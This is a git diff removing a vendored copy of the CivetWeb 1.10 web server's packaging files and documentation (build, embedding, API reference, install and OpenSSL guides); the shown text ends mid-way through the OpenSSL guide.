-  cd "$srcdir/$_pkgname"
-  make build WITH_IPV6=1
-}
-
-package() {
-  cd "$srcdir/$_pkgname"
-  make install PREFIX="$pkgdir/usr" SYSCONFDIR="$pkgdir/etc/local/$_pkgname"
-  
-  install -Dm644 "$srcdir/$_pkgname/distribution/arch/$_pkgname.service" "$pkgdir/usr/lib/systemd/system/$_pkgname.service"
-
-  sed -i "s/^document_root [^\n]*/document_root \/srv\/http/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-  sed -i "s/^# access_log_file/access_log_file \/var\/log\/$_pkgname\/access.log/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-  sed -i "s/^# error_log_file/access_log_file \/var\/log\/$_pkgname\/error.log/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-}
-
-# vim:set ts=2 sw=2 et:
diff --git a/thirdparty/civetweb-1.10/distribution/arch/civetweb.service b/thirdparty/civetweb-1.10/distribution/arch/civetweb.service
deleted file mode 100644
index 5327b6c..0000000
--- a/thirdparty/civetweb-1.10/distribution/arch/civetweb.service
+++ /dev/null
@@ -1,9 +0,0 @@
-[Unit]
-Description=Civetweb httpd
-After=syslog.target network.target remote-fs.target nss-lookup.target
-
-[Service]
-ExecStart=/usr/local/bin/civetweb /usr/local/etc/civetweb/civetweb.conf
-
-[Install]
-WantedBy=multi-user.target
diff --git a/thirdparty/civetweb-1.10/docs/APIReference.md b/thirdparty/civetweb-1.10/docs/APIReference.md
deleted file mode 100644
index 58c2faf..0000000
--- a/thirdparty/civetweb-1.10/docs/APIReference.md
+++ /dev/null
@@ -1,134 +0,0 @@
-# CivetWeb API Reference
-
-CivetWeb is often used as HTTP and HTTPS library inside a larger application.
-A C API is available to integrate the CivetWeb functionality in a larger
-codebase. A C++ wrapper is also available, although it is not guaranteed
-that all functionality available through the C API can also be accessed
-from C++. This document describes the public C API. Basic usage examples of
-the API can be found in [Embedding.md](Embedding.md), as well as in the
-examples directory.
-
-## Macros
-
-| Macro | Description |
-| :--- | :--- |
-| **`CIVETWEB_VERSION`** | The current version of the software as a string with the major and minor version number seperated with a dot. For version 1.9, this string will have the value "1.9", for thw first patch of this version "1.9.1". |
-| **`CIVETWEB_VERSION_MAJOR`** | The current major version as number, e.g., (1) for version 1.9. |
-| **`CIVETWEB_VERSION_MINOR`** | The current minor version as number, e.g., (9) for version 1.9. |
-| **`CIVETWEB_VERSION_PATCH`** | The current patch version as number, e.g., (0) for version 1.9 or (1) for version 1.9.1. |
-
-## Handles
-
-* `struct mg_context *`
-Handle for one instance of the HTTP(S) server.
-All functions using `const struct mg_context *` as an argument do not modify a running server instance, but just query information. Functions using a non-const `struct mg_context *` as an argument may modify a server instance (e.g., register a new URI, stop the server, ...).
-
-* `struct mg_connection *`
-Handle for one individual client-server connection.
-Functions working with `const struct mg_connection *` operate on data already known to the server without reading data from or sending data to the client. Callbacks using a `const struct mg_connection *` argument are supposed to not call functions from the `mg_read()` and `mg_write()` family. To support a correct application, reading and writing functions require a non-const `struct mg_connection *` connection handle.
-
-The content of both structures is not defined in the interface - they are only used as opaque pointers (handles).
-
-## Structures
-
-* [`struct mg_client_cert;`](api/mg_client_cert.md)
-* [`struct mg_client_options;`](api/mg_client_options.md)
-* [`struct mg_callbacks;`](api/mg_callbacks.md)
-* [`struct mg_form_data_handler;`](api/mg_form_data_handler.md)
-* [`struct mg_header;`](api/mg_header.md)
-* [`struct mg_option;`](api/mg_option.md)
-* [`struct mg_request_info;`](api/mg_request_info.md)
-* [`struct mg_server_ports;`](api/mg_server_ports.md)
-
-
-## Library API Functions
-
-* [`mg_init_library( feature );`](api/mg_init_library.md)
-* [`mg_exit_library( feature );`](api/mg_exit_library.md)
-
-* [`mg_check_feature( feature );`](api/mg_check_feature.md)
-* [`mg_version();`](api/mg_version.md)
-
-
-## Server API Functions
-
-* [`mg_start( callbacks, user_data, options );`](api/mg_start.md)
-* [`mg_stop( ctx );`](api/mg_stop.md)
-
-* [`mg_get_builtin_mime_type( file_name );`](api/mg_get_builtin_mime_type.md)
-* [`mg_get_option( ctx, name );`](api/mg_get_option.md)
-* [`mg_get_server_ports( ctx, size, ports );`](api/mg_get_server_ports.md)
-* [`mg_get_user_data( ctx );`](api/mg_get_user_data.md)
-* [`mg_set_auth_handler( ctx, uri, handler, cbdata );`](api/mg_set_auth_handler.md)
-* [`mg_set_request_handler( ctx, uri, handler, cbdata );`](api/mg_set_request_handler.md)
-* [`mg_set_websocket_handler( ctx, uri, connect_handler, ready_handler, data_handler, close_handler, cbdata );`](api/mg_set_websocket_handler.md)
-
-* [`mg_lock_context( ctx );`](api/mg_lock_context.md)
-* [`mg_unlock_context( ctx );`](api/mg_unlock_context.md)
-
-* [`mg_get_context( conn );`](api/mg_get_context.md)
-
-* [`mg_send_http_error( conn, status_code, fmt, ... );`](api/mg_send_http_error.md)
-
-* [`mg_send_digest_access_authentication_request( conn, realm );`](api/mg_send_digest_access_authentication_request.md)
-* [`mg_check_digest_access_authentication( conn, realm, filename );`](api/mg_check_digest_access_authentication.md)
-* [`mg_modify_passwords_file( passwords_file_name, realm, user, password );`](api/mg_modify_passwords_file.md)
-
-
-## Client API Functions
-
-* [`mg_connect_client( host, port, use_ssl, error_buffer, error_buffer_size );`](api/mg_connect_client.md)
-* [`mg_connect_websocket_client( host, port, use_ssl, error_buffer, error_buffer_size, path, origin, data_func, close_func, user_data);`](api/mg_connect_websocket_client.md)
-* [`mg_websocket_client_write( conn, opcode, data, data_len );`](api/mg_websocket_client_write.md)
-
-* [`mg_download( host, port, use_ssl, error_buffer, error_buffer_size, fmt, ... );`](api/mg_download.md)
-
-
-## Common API Functions
-
-* [`mg_close_connection( conn );`](api/mg_close_connection.md)
-* [`mg_cry( conn, fmt, ... );`](api/mg_cry.md)
-
-* [`mg_get_cookie( cookie, var_name, buf, buf_len );`](api/mg_get_cookie.md)
-* [`mg_get_header( conn, name );`](api/mg_get_header.md)
-* [`mg_get_request_info( conn );`](api/mg_get_request_info.md)
-* [`mg_get_response( conn, ebuf, ebuf_len, timeout );`](api/mg_get_response.md)
-* [`mg_get_response_code_text( conn, response_code );`](api/mg_get_response_code_text.md)
-* [`mg_get_user_connection_data( conn );`](api/mg_get_user_connection_data.md)
-* [`mg_get_valid_options();`](api/mg_get_valid_options.md)
-* [`mg_get_var( data, data_len, var_name, dst, dst_len );`](api/mg_get_var.md)
-* [`mg_get_var2( data, data_len, var_name, dst, dst_len, occurrence );`](api/mg_get_var2.md)
-* [`mg_handle_form_request( conn, fdh );`](api/mg_handle_form_request.md)
-* [`mg_lock_connection( conn );`](api/mg_lock_connection.md)
-* [`mg_md5( buf, ... );`](api/mg_md5.md)
-* [`mg_printf( conn, fmt, ... );`](api/mg_printf.md)
-* [`mg_read( conn, buf, len );`](api/mg_read.md)
-* [`mg_send_chunk( conn, buf, len );`](api/mg_send_chunk.md)
-* [`mg_send_file( conn, path );`](api/mg_send_file.md)
-* [`mg_send_mime_file( conn, path, mime_type );`](api/mg_send_mime_file.md)
-* [`mg_send_mime_file2( conn, path, mime_type, additional_headers );`](api/mg_send_mime_file2.md)
-* [`mg_set_user_connection_data( conn, data );`](api/mg_set_user_connection_data.md)
-* [`mg_start_thread( f, p );`](api/mg_start_thread.md)
-* [`mg_store_body( conn, path );`](api/mg_store_body.md)
-* [`mg_strcasecmp( s1, s2 );`](api/mg_strcasecmp.md)
-* [`mg_strncasecmp( s1, s2, len );`](api/mg_strncasecmp.md)
-* [`mg_unlock_connection( conn );`](api/mg_unlock_connection.md)
-* [`mg_url_decode( src, src_len, dst, dst_len, is_form_url_encoded );`](api/mg_url_decode.md)
-* [`mg_url_encode( src, dst, dst_len );`](api/mg_url_encode.md)
-* [`mg_websocket_write( conn, opcode, data, data_len );`](api/mg_websocket_write.md)
-* [`mg_write( conn, buf, len );`](api/mg_write.md)
-
-
-## Diagnosis Functions
-
-* [`mg_get_system_info( buffer, buf_len );`](api/mg_get_system_info.md)
-* [`mg_get_context_info( ctx, buffer, buf_len );`](api/mg_get_context_info.md)
-* [`mg_get_connection_info( ctx, idx, buffer, buf_len );`](api/mg_get_context_info.md)
-
-
-## Deprecated:
-
-* [~~`mg_get_valid_option_names();`~~](api/mg_get_valid_option_names.md)
-* [~~`mg_upload( conn, destination_dir );`~~](api/mg_upload.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/Building.md b/thirdparty/civetweb-1.10/docs/Building.md
deleted file mode 100644
index 9d7b56f..0000000
--- a/thirdparty/civetweb-1.10/docs/Building.md
+++ /dev/null
@@ -1,216 +0,0 @@
-Building CivetWeb
-=========
-
-This guide covers the build instructions for the stand-alone web server.
-See [Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) for information on extending an existing C or C++ application. A brief overview of the source code files can be found in [Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) as well.
-
-#### Where to get the source code?
-
-The latest version can be found at
-https://github.com/civetweb/civetweb
-
-Released versions can be found at
-https://github.com/civetweb/civetweb/releases
-
-
-Building for Windows
----------
-
-#### Using Visual Studio
-
-Open the *VS/civetweb.sln* in Visual Studio.
-To include SSL support, you may have to add an extra library for the cryptography support. You might wish to use yaSSL.  However, it is GPL licensed or uses a commercial license. See [yaSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/yaSSL.md) for more information.
-Alternatively, you might wish to use OpenSSL. See [OpenSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/OpenSSL.md) for more information.
-
-#### Using MinGW-w64 or TDM-GCC
-In the start menu locate and run the "Run terminal" batch file. For TDM-GCC this is named "MinGW Command Prompt".
-Navigate to the civetweb sources directory and run:
-```
-mingw32-make CC=gcc
-```
-
-#### Using Qt Creator
-Open the Qt Designer project in the Qt folder
-
-#### Using CMake
-Except for the components in the `third_party` folder (e.g., Lua and Duktape), CivetWeb can also be built with CMake.
-CMake can be used for all supported operating systems.
-
-
-Building for Linux, BSD, and OSX
----------
-
-## Using Make
-
-```
-make help
-```
-Get a list of all supported make option
-
-```
-make build
-```
-compile the code
-
-```
-make install
-```
-Install on the system, Linux only.
-
-```
-make lib WITH_CPP=1 WITH_IPV6=1
-make clean slib WITH_CPP=1 WITH_LUA=1 WITH_WEBSOCKET=1
-```
-Build the static and shared libraries.
-The *WITH_CPP* make option is to include the CivetServer class.
-The additional make options configure the library just as it would the application.
-
-The *slib* option should be done on a separate clean build as position
-independent code (PIC) is required for it.  Trying to run it after
-building the static library or the server will result in a link error.
-
-```
-make clean
-```
-Clean up files generated during the build
-
-## Setting build options
-
-Make options can be set on the command line with the make command like so.
-```
-make build WITH_LUA=1
-```
-
-
-| Make Options              | Description                               |
-| ------------------------- | ----------------------------------------- |
-| WITH_LUA=1                | build with Lua support                    |
-| WITH_DUKTAPE=1            | build with server-side JavaScript support |
-| WITH_DEBUG=1              | build with GDB debug support              |
-| WITH_IPV6=1               | with IPV6 support                         |
-| WITH_WEBSOCKET=1          | build with web socket support             |
-| WITH_SERVER_STATS=1       | build with support for server statistics  |
-| WITH_CPP=1                | build libraries with c++ classes          |
-| CONFIG_FILE=file          | use 'file' as the config file             |
-| CONFIG_FILE2=file         | use 'file' as the backup config file      |
-| HTMLDIR=/path             | place to install initial web pages        |
-| DOCUMENT_ROOT=/path       | HTMLDIR override, config option, install  |
-|                           | nothing is installed here.                |
-| PORTS=8080                | listening ports override when installing  |
-| SSL_LIB=libssl.so.0       | use versioned SSL library                 |
-| CRYPTO_LIB=libcrypto.so.0 | system versioned CRYPTO library           |
-| PREFIX=/usr/local         | sets the install directory                |
-| COPT='-DNO_SSL'           | method to insert compile flags            |
-
-Note that the WITH_* options used for *make* are not identical to the
-preprocessor defines in the source code - usually USE_* is used there.
-
-## Changing PREFIX
-
-To change the target destination pass the `PREFIX` option to the command `make install` (not `make build`). Example usage:
-
-```
-$ make build
-$ make -n install PREFIX=/opt/civetweb
-```
-Note: The `-n` corresponds to the `--dry-run` option (it does not make any changes): You can see where `make install` would install. Example output of the above command:
-
-```
-$ make -n install PREFIX=/opt/civetweb
-install -d -m 755  "/opt/civetweb/share/doc/civetweb"
-install -m 644 resources/itworks.html /opt/civetweb/share/doc/civetweb/index.html
-install -m 644 resources/civetweb_64x64.png /opt/civetweb/share/doc/civetweb/
-install -d -m 755  "/opt/civetweb/etc"
-install -m 644 resources/civetweb.conf  "/opt/civetweb/etc/"
-sed -i 's#^document_root.*$#document_root /opt/civetweb/share/doc/civetweb#' "/opt/civetweb/etc/civetweb.conf"
-sed -i 's#^listening_ports.*$#listening_ports 8080#' "/opt/civetweb/etc/civetweb.conf"
-install -d -m 755  "/opt/civetweb/share/doc/civetweb"
-install -m 644 *.md "/opt/civetweb/share/doc/civetweb"
-install -d -m 755 "/opt/civetweb/bin"
-install -m 755 civetweb "/opt/civetweb/bin/"
-```
-
-If the output looks good: Just remove the `-n` option to actually install the software on your system.
-
-## Setting compile flags
-
-Compile flags can be set using the *COPT* make option like so.
-```
-make build COPT="-DNDEBUG -DNO_CGI"
-```
-
-| Compile Flags             | Description                          |
-| ------------------------- | ------------------------------------ |
-| NDEBUG                    | strip off all debug code             |
-| DEBUG                     | build debug version (very noisy)     |
-| NO_CGI                    | disable CGI support                  |
-| NO_CACHING                | disable caching functionality        |
-| NO_SSL                    | disable SSL functionality            |
-| NO_SSL_DL                 | link against system libssl library   |
-| NO_FILES                  | do not serve files from a directory  |
-| SQLITE_DISABLE_LFS        | disables large files (Lua only)      |
-| SSL_ALREADY_INITIALIZED   | do not initialize libcrypto          |
-
-## Cross Compiling
-
-Take total control with *CC*, *COPT* and *TARGET_OS* as make options.
-TARGET_OS is used to determine some compile details as will as code function.
-TARGET_OS values should be be one found in *resources/Makefile.in-os*.
-
-```
-make CC=arm-none-linux-gnueabi-gcc COPT="-march=armv7-a  -mfpu=vfp -mfloat-abi=softfp" TARGET_OS=FROG
-```
-
-## Cocoa DMG Packaging (OSX Only)
-
-Use the alternate *Makefile.osx* to do the build.  The entire build has
-to be done using *Makefile.osx* because additional compile and link options
-are required.  This Makefile has all the same options as the other one plus
-one additional *package* rule.
-
-```
-make -f Makefile.osx package
-```
-
-Building with Buildroot
----------
-
-[Buildroot](http://buildroot.uclibc.org/) is a tool for creating cross compiled file systems.  Including Civetweb in buildroot is fairly easy.  There is even support for various build options.
-
-1. First, check if it already there.
-  - In buildroot, make menuconfig
-     - Package Selection for the target --->
-     - Networking applications  --->
-     - civetweb
-2. If not there, just add it
-  - copy *Config.in* and *civetweb.mk* from Civetweb's *contrib/buildroot/* to Buildroot's *package/civetweb/* directory.
-  - In Buildroot's *package/Config.in, insert the following line in were you will know how to find it in the menu.
-    > ``` source "package/civetweb/Config.in" ```
-
-
-Building on Android
----------
-
-This is a small guide to help you run civetweb on Android, originally
-tested on the HTC Wildfire.
-Note: You do not need root access to run civetweb on Android.
-
-- Download the source from the Downloads page.
-- Download the Android NDK from [http://developer.android.com/tools/sdk/ndk/index.html](http://developer.android.com/tools/sdk/ndk/index.html)
-- Run `/path-to-ndk/ndk-build -C /path-to-civetweb/resources`
-  That should generate civetweb/lib/armeabi/civetweb
-- Using the adb tool (you need to have Android SDK installed for that),
-  push the generated civetweb binary to `/data/local` folder on device.
-- From adb shell, navigate to `/data/local` and execute `./civetweb`.
-- To test if the server is running fine, visit your web-browser and
-  navigate to `http://127.0.0.1:8080` You should see the `Index of /` page.
-
-
-Notes:
-
-- `jni` stands for Java Native Interface. Read up on Android NDK if you want
-  to know how to interact with the native C functions of civetweb in Android
-  Java applications.
-
-
-
diff --git a/thirdparty/civetweb-1.10/docs/Contribution.md b/thirdparty/civetweb-1.10/docs/Contribution.md
deleted file mode 100644
index aa88c14..0000000
--- a/thirdparty/civetweb-1.10/docs/Contribution.md
+++ /dev/null
@@ -1,23 +0,0 @@
-Contributing to CivetWeb
-====
-
-Contributions to CivetWeb are welcome, provided all contributions carry the MIT license.
-
-- Please report issues on GitHub. If the issue you want to report is already reported there, add a note with your specific details to that issue. In case of doubt, please create a new issue.
-- If you know how to fix the issue, please create a pull request on GitHub. Please take care your modifications pass the continuous integration checks. These checks are performed automatically when you create a pull request, but it may take some hours until all tests are completed. Please provide a description for every pull request.
-- Alternatively, you can post a patch or describe the required modifications in a GitHub issue.
-However, a pull request would be preferred.
-- Contributor names are listed in CREDITS.md, unless you explicitly state you don't want your name to be listed there. This file is occasionally updated, adding new contributors, using author names from git commits and GitHub comments.
-
-
-- In case your modifications either
-  1. modify or extend the API,
-  2. affect multi-threading,
-  3. imply structural changes,
-  or
-  4. have significant influence on maintenance,
-  
-  please first create an issue on GitHub or create a thread on the CivetWeb discussion group, to discuss the planned changed.
-
-- In case you think you found a security issue that should be evaluated and fixed before public disclosure, feel free to write an email.  Although CivetWeb is a fork from Mongoose from 2013, the code bases are different now, so security vulnerabilities of Mongoose usually do not affect CivetWeb.  Open an issue for Mongoose vulnerabilities you want to have checked if CivetWeb is affected.
-
diff --git a/thirdparty/civetweb-1.10/docs/Embedding.md b/thirdparty/civetweb-1.10/docs/Embedding.md
deleted file mode 100644
index 0ffbc23..0000000
--- a/thirdparty/civetweb-1.10/docs/Embedding.md
+++ /dev/null
@@ -1,260 +0,0 @@
-Embedding CivetWeb
-=========
-
-CivetWeb is primarily designed so applications can easily add HTTP and HTTPS server as well as WebSocket functionality.  For example, an application server could use CivetWeb to enable a web service interface for automation or remote control.
-
-However, it can also be used as a stand-alone executable. It can deliver static files and offers built-in server side Lua, JavaScript and CGI support. Some instructions how to build the stand-alone server can be found in [Building.md](https://github.com/civetweb/civetweb/blob/master/docs/Building.md).
-
-Files
-------
-
-There is just a small set of files to compile in to the application,
-but if a library is desired, see [Building.md](https://github.com/CivetWeb/CivetWeb/blob/master/docs/Building.md)
-
-#### Regarding the INL file extension
-The *INL* file extension represents code that is statically included inline in a source file.  Slightly different from C++ where it means "inline" code which is technically not the same as static code. CivetWeb overloads this extension for the sake of clarity as opposed to having .c extensions on files that should not be directly compiled.
-
-#### HTTP Server Source Files
-
-These files constitute the CivetWeb library.  They do not contain a `main` function,
-but all functions required to run a HTTP server.
-
-  - HTTP server API
-    - include/civetweb.h
-  - C implementation
-    - src/civetweb.c
-    - src/md5.inl (MD5 calculation)
-    - src/sha1.inl (SHA calculation)
-    - src/handle\_form.inl (HTML form handling functions)
-    - src/timer.inl (optional timer support)
-  - Optional: C++ wrapper
-    - include/CivetServer.h (C++ interface)
-    - src/CivetServer.cpp (C++ wrapper implementation)
-  - Optional: Third party components
-    - src/third\_party/* (third party components, mainly used for the standalone server)
-    - src/mod\_*.inl (modules to access third party components from civetweb)
-
-
-Note: The C++ wrapper uses the official C interface (civetweb.h) and does not add new features to the server. Several features available in the C interface are missing in the C++ interface. While all features should be accessible using the C interface, this is not a design goal of the C++ interface.
-
-
-#### Additional Source Files for Executables
-
-These files can be used to build a server executable. They contain a `main` function
-starting the HTTP server.
-
-  - Stand-alone C Server
-      - src/main.c
-  - Reference embedded C Server
-      - examples/embedded\_c/embedded\_c.c
-  - Reference embedded C++ Server
-      - examples/embedded\_cpp/embedded\_cpp.cpp
-
-Note: The "embedded" example is actively maintained, updated, extended and tested. Other examples in the examples/ folder might be outdated and remain there for reference.
-
-
-Quick Start
-------
-
-By default, the server will automatically serve up files like a normal HTTP server.  An embedded server is most likely going to overload this functionality.
-
-### C
-  - Include the C interface ```civetweb.h```.
-  - Use `mg_start()` to start the server.
-      - Use *options* to select the port and document root among other things.
-      - Use *callbacks* to add your own hooks.
-  - Use `mg_set_request_handler()` to easily add your own request handlers.
-  - Use `mg_stop()` to stop the server.
-
-### C++
-  - Note that CivetWeb is Clean C, and C++ interface ```CivetServer.h``` is only a wrapper layer around the C interface.
-    Not all CivetWeb features available in C are also available in C++.
-  - Create CivetHandlers for each URI.
-  - Register the handlers with `CivetServer::addHandler()`
-  - `CivetServer` starts on contruction and stops on destruction.
-  - Use contructor *options* to select the port and document root among other things.
-  - Use constructor *callbacks* to add your own hooks.
-
-Alternative quick start: Have a look at the examples embedded\_c and embedded\_cpp
-
-
-Lua Support
-------
-
-Lua is a server side include functionality.  Files ending in .lua will be processed with Lua.
-
-##### Add the following CFLAGS
-
-  - `-DLUA_COMPAT_ALL`
-  - `-DUSE_LUA`
-  - `-DUSE_LUA_SQLITE3`
-  - `-DUSE_LUA_FILE_SYSTEM`
-
-##### Add the following sources
-
-  - src/mod\_lua.inl
-  - src/third\_party/lua-5.2.4/src
-     + lapi.c
-     + lauxlib.c
-     + lbaselib.c
-     + lbitlib.c
-     + lcode.c
-     + lcorolib.c
-     + lctype.c
-     + ldblib.c
-     + ldebug.c
-     + ldo.c
-     + ldump.c
-     + lfunc.c
-     + lgc.c
-     + linit.c
-     + liolib.c
-     + llex.c
-     + lmathlib.c
-     + lmem.c
-     + loadlib.c
-     + lobject.c
-     + lopcodes.c
-     + loslib.c
-     + lparser.c
-     + lstate.c
-     + lstring.c
-     + lstrlib.c
-     + ltable.c
-     + ltablib.c
-     + ltm.c
-     + lundump.c
-     + lvm.c
-     + lzio.c
-  - src/third\_party/sqlite3.c
-  - src/third\_party/sqlite3.h
-  - src/third\_party/lsqlite3.c
-  - src/third\_party/lfs.c
-  - src/third\_party/lfs.h
-
-This build is valid for Lua version Lua 5.2. It is also possible to build with Lua 5.1 (including LuaJIT) or Lua 5.3.
-
-
-JavaScript Support
-------
-
-CivetWeb can be built with server side JavaScript support by including the Duktape library.
-
-
-CivetWeb internals
-------
-
-CivetWeb is multithreaded web server. `mg_start()` function allocates
-web server context (`struct mg_context`), which holds all information
-about web server instance:
-
-- configuration options. Note that CivetWeb makes internal copies of
-  passed options.
-- SSL context, if any
-- user-defined callbacks
-- opened listening sockets
-- a queue for accepted sockets
-- mutexes and condition variables for inter-thread synchronization
-
-When `mg_start()` returns, all initialization is guaranteed to be complete
-(e.g. listening ports are opened, SSL is initialized, etc). `mg_start()` starts
-some threads: a master thread, that accepts new connections, and several
-worker threads, that process accepted connections. The number of worker threads
-is configurable via `num_threads` configuration option. That number puts a
-limit on number of simultaneous requests that can be handled by CivetWeb.
-If you embed CivetWeb into a program that uses SSL outside CivetWeb as well,
-you may need to initialize SSL before calling `mg_start()`, and set the pre-
-processor define `SSL_ALREADY_INITIALIZED`. This is not required if SSL is
-used only within CivetWeb.
-
-When master thread accepts new a connection, a new accepted socket (described
-by `struct socket`) it placed into the accepted sockets queue,
-which has size of `MGSQLEN` (default 20).
-Any idle worker thread can grab accepted sockets from that queue.
-If all worker threads are busy, master thread can accept and queue up to
-20 more TCP connections, filling up the queue.
-In the attempt to queue even more accepted connection, the master thread blocks
-until there is space in the queue. When the master thread is blocked on a
-full queue, the operating system can also queue incoming connection.
-The number is limited by the `listen()` call parameter,
-which is `SOMAXCONN` and depends on the platform.
-
-Worker threads are running in an infinite loop, which in a simplified form
-looks something like this:
-
-```C
-    static void *worker_thread() {
-      while (consume_socket()) {
-        process_new_connection();
-      }
-    }
-```
-
-Function `consume_socket()` gets a new accepted socket from the CivetWeb socket
-queue, atomically removing it from the queue. If the queue is empty,
-`consume_socket()` blocks and waits until a new socket is placed in the queue
-by the master thread.
-
-`process_new_connection()` actually processes the
-connection, i.e. reads the request, parses it, and performs appropriate action
-depending on the parsed request.
-
-Master thread uses `poll()` and `accept()` to accept new connections on
-listening sockets. `poll()` is used to avoid `FD_SETSIZE` limitation of
-`select()`. Since there are only a few listening sockets, there is no reason
-to use hi-performance alternatives like `epoll()` or `kqueue()`. Worker
-threads use blocking IO on accepted sockets for reading and writing data.
-All accepted sockets have `SO_RCVTIMEO` and `SO_SNDTIMEO` socket options set
-(controlled by the `request_timeout_ms` CivetWeb option, 30 seconds default)
-which specifies a read/write timeout on client connections.
-
-
-A minimal example
-------
-
-Initializing a HTTP server
-```C
-{
-    /* Server context handle */
-    struct mg_context *ctx;
-
-    /* Initialize the library */
-    mg_init_library(0);
-
-    /* Start the server */
-    ctx = mg_start(NULL, 0, NULL);
-
-    /* Add some handler */
-    mg_set_request_handler(ctx, "/hello", handler, "Hello world");
-
-    ... Run the application ...
-    
-    /* Stop the server */
-    mg_stop(ctx);
-
-    /* Un-initialize the library */
-    mg_exit_library();
-}
-```
-
-A simple callback
-```C
-static int
-handler(struct mg_connection *conn, void *ignored)
-{
-	const char *msg = "Hello world";
-	unsigned long len = (unsigned long)strlen(msg);
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Content-Type: text/plain\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	mg_write(conn, msg, len);
-
-	return 200;
-}
-```
-
diff --git a/thirdparty/civetweb-1.10/docs/Installing.md b/thirdparty/civetweb-1.10/docs/Installing.md
deleted file mode 100644
index 2476b94..0000000
--- a/thirdparty/civetweb-1.10/docs/Installing.md
+++ /dev/null
@@ -1,38 +0,0 @@
-Civetweb Install Guide
-====
-
-This guide covers the distributions for CivetWeb.  The latest source code is available at [https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb).
-
-Windows
----
-
-This pre-built version comes pre-built wit Lua support. Libraries for SSL support are not included due to licensing restrictions;
-however, users may add an SSL library themselves.
-Instructions for adding SSL support can be found in [https://github.com/civetweb/civetweb/tree/master/docs](https://github.com/civetweb/civetweb/tree/master/docs)
-
-1. In case the Visual C++ Redistributable are not already installed:
-  32 Bit Version: Install the [Redistributable for Visual Studio 2010](http://www.microsoft.com/en-us/download/details.aspx?id=8328)
-  64 Bit Version: Install the [Redistributable for Visual Studio 2015](http://www.microsoft.com/en-us/download/details.aspx?id=48145)
-  Note: The required version of the Redistributables may vary, depending on the CivetWeb version.
-2. Download latest *civetweb-win.zip* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-3. When started, Civetweb puts itself into the tray.
-
-OS X
----
-
-This pre-built version comes with Lua, IPV6 and SSL support.
-
-1. Download the latest *Civetweb.dmg* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-2. Click on the it and look for the attachment in the finder.
-4. Drag Civetweb to the Applications folder.
-5. When started, Civetweb puts itself into top menu.
-
-Linux
----
-
-1. Download the latest *civetweb.tar.gz* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-2. Open archive and change to the new directory.
-3. make help
-4. make
-5. make install
-6. Run the program ```/usr/local/bin/civetweb```, it will use the configuration file */usr/local/etc/civetweb.conf*.
diff --git a/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md b/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md
deleted file mode 100644
index 16bc7dd..0000000
--- a/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# Interface changes
-
-## Proposed interface changes for 1.10
-
-Status: To be discussed
-
-### Server interface
-
-#### mg\_start / mg\_init\_library
-
-Calling mg\_init\_library is recommended before calling mg\_start.
-
-Compatibility:
-Initially, mg\_init\_library will be called implicitly if it has 
-not been called before mg\_start.
-If mg\_init\_library was not called, mg\_stop may leave memory leaks.
-
-#### mg\_websocket\_write functions
-
-Calling mg\_lock\_connection is no longer called implicitly
-in mg\_websocket\_write functions. 
-If you use websocket write functions them from two threads,
-you must call mg\_lock\_connection explicitly, just like for any
-other connection.
-
-This is an API harmonization issue.
-
-Compatibility:
-If a websocket connection was used in only one thread, there is
-no incompatibility. If a websocket connection was used in multiple
-threads, the user has to add the mg\_lock\_connection before and
-the mg\_unlock\_connection after the websocket write call.
-
-#### open\_file member of mg\_callbacks
-
-This member is going to be removed.
-It is superseeded by mg\_add\_request\_handler.
-
-Compatibility:
-Current code using open\_file needs to be changed.
-Instructions how to do this will be provided.
-
-
-### Client interface
-
-
-#### mg\_init\_library
-
-Calling mg\_init\_library is required before calling any client
-function. In particular, the TLS initialization must be done
-before using mg\_connect\_client\_secure.
-
-Compatibility:
-Some parts of the client interface did not work, if mg\_start
-was not called before. Now server and client become independent.
-
-#### mg\_connect\_client (family)
-
-mg_connect_client needs several new parameters (options).
-
-Details are to be defined.
-
-mg_connect_client and mg_download should return a different kind of
-mg_connection than used in server callbacks. At least, there should
-be a function mg_get_response_info, instead of using 
-mg_get_request_info, and getting the HTTP response code from the
-server by looking into the uri member of struct mg_request_info.
-
-
-### `size_t` in all interface
-
-Having `size_t` in interfaces while building for 32 and 64 bit
-complicates maintenance in an unnecessary way 
-(see [498](https://github.com/civetweb/civetweb/issues/498)).
-
-Replace all data sizes by 64 bit integers.
-
-
-### Pattern definition
-
-The current definition of pattern matching is problematic
-(see [499](https://github.com/civetweb/civetweb/issues/499)).
-
-Find and implement a new definition.
-
-
diff --git a/thirdparty/civetweb-1.10/docs/OpenSSL.md b/thirdparty/civetweb-1.10/docs/OpenSSL.md
deleted file mode 100644
index 1f01cca..0000000
--- a/thirdparty/civetweb-1.10/docs/OpenSSL.md
+++ /dev/null
@@ -1,153 +0,0 @@
-Adding OpenSSL Support
-=====
-
-Civetweb supports *HTTPS* connections using the OpenSSL transport layer
-security (TLS) library. OpenSSL is a free, open source library (see
-http://www.openssl.org/).
-
-
-Getting Started
-----
-
-- Install OpenSSL on your system. There are OpenSSL install packages for all
-  major Linux distributions as well as a setup for Windows.
-- The default build configuration of the civetweb web server will load the
-  required OpenSSL libraries, if a HTTPS certificate has been configured.
-
-
-Civetweb Configuration
-----
-
-The configuration file must contain an https port, identified by a letter 's'
-attached to the port number.
-To serve http and https from their standard ports use the following line in
-the configuration file 'civetweb.conf':
-<pre>
-  listening_ports 80, 443s
-</pre>
-To serve only https use:
-<pre>
-  listening_ports 443s
-</pre>
-
-Furthermore the SSL certificate file must be set:
-<pre>
-  ssl_certificate d:\civetweb\certificate\server.pem
-</pre>
-
-
-Creating a self signed certificate
-----
-
